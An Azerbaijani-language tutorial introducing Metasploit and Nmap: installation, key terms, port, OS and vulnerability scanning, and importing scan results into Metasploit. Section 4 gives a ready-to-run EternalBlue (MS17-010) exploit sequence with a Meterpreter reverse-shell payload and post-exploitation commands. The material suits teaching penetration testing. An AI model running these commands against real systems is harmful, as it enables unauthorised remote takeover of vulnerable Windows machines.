Metasploit və Nmap: Təhlükəsizlik Alətləri və İstifadə Qaydaları
1. Giriş
Metasploit Framework və Nmap (Network Mapper) kibertəhlükəsizlik mütəxəssisləri üçün ən vacib alətlərdən biridir. Bu məqalədə hər iki alətin əsas xüsusiyyətləri, istifadə qaydaları və komandaları haqqında danışacağıq.
Metasploit Framework
2. Metasploit-in Qurulması
2.1. Linux və Kali Linux üzərində quraşdırma
Metasploit Kali Linux-da standart olaraq gəlir. Əgər sisteminizdə quraşdırılmayıbsa, aşağıdakı əmrləri istifadə edərək quraşdıra bilərsiniz:
sudo apt update && sudo apt install metasploit-framework -y
Metasploit-i işə salmaq üçün:
msfconsole
2.2. Windows üzərində quraşdırma
Metasploit-i Windows üzərində işlətmək üçün rəsmi installer-dən istifadə edə bilərsiniz:
- Rəsmi saytdan yükləyin: https://www.rapid7.com/products/metasploit/download/
- Quraşdırmanı tamamladıqdan sonra Metasploit Console-u açın.
3. Metasploit-in Əsas Terminləri
- Exploit – Hədəf sistemdəki zəiflikdən istifadə edən kod.
- Payload – Exploit icra edildikdən sonra sistemdə işləyən kod.
- Auxiliary – Exploit olmayan, lakin təhlükəsizlik skaneri və ya köməkçi alətlər.
- Post-Exploitation – Sistemdə tam nəzarəti ələ keçirdikdən sonra istifadə olunan alətlər.
4. Metasploit ilə Əsas Əmrlər və Modullar
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
exploit
Meterpreter komandaları:
sysinfo # Sistem haqqında məlumatı göstərir
getuid # İstifadəçi identifikasiyasını göstərir
shell # Hədəf sistemdə komanda xəttinə keçid edir
Nmap (Network Mapper)
5. Nmap-ın Giriş və Qurulması
Nmap şəbəkələri skan etmək, portları və xidmətləri təyin etmək üçün istifadə olunan güclü alətdir.
Linux üzərində quraşdırmaq üçün:
sudo apt install nmap -y
Windows üçün rəsmi saytdan yükləmək olar: https://nmap.org/download.html
Nmap-ın versiyasını yoxlamaq üçün:
nmap --version
6. Əsas Nmap Komandaları
6.1. Sadə Skanlar
nmap 192.168.1.1 # Bir IP ünvanı skan edir
nmap 192.168.1.0/24 # Bütün şəbəkəni skan edir
6.2. Port Skanı
nmap -p 80,443 192.168.1.1 # Yalnız 80 və 443 portlarını skan edir
nmap -p- 192.168.1.1 # Bütün 65535 portları skan edir
6.3. OS və Xidmət Versiya Aşkarlaması
nmap -O 192.168.1.1 # Əməliyyat sistemini təyin edir
nmap -sV 192.168.1.1 # Xidmətlərin versiyalarını təyin edir
6.4. Hədəf Sistemlərin Aktivlik Yoxlanışı (Ping Skanı)
nmap -sn 192.168.1.0/24 # Aktiv hostları tapır
6.5. Skriptlərdən İstifadə (NSE – Nmap Scripting Engine)
nmap --script=vuln 192.168.1.1 # Məlum zəiflikləri skan edir
nmap --script=http-enum 192.168.1.1 # Veb serverdə işləyən servisləri aşkar edir
7. Nmap və Metasploit İnteqrasiyası
Nmap ilə skan edilmiş nəticələri Metasploit-ə ötürmək mümkündür:
nmap -oX scan_result.xml 192.168.1.0/24 # XML formatında nəticələri saxlayır
msfconsole
db_import scan_result.xml # Nəticələri Metasploit-ə import edir
hosts # Tapılmış hostları göstərir
8. Nəticə
Metasploit və Nmap kibertəhlükəsizlik sahəsində ən vacib alətlərdən biridir. Bu məqalədə onların əsas istifadəsini, komandalarını və tətbiq sahələrini izah etdik. Hər iki alət sistemlərin zəifliklərini aşkarlamaq və təhlükəsizlik testləri aparmaq üçün effektiv vasitələrdir.
Unutmayın ki, bu alətlər yalnız etik və qanuni məqsədlər üçün istifadə edilməlidir.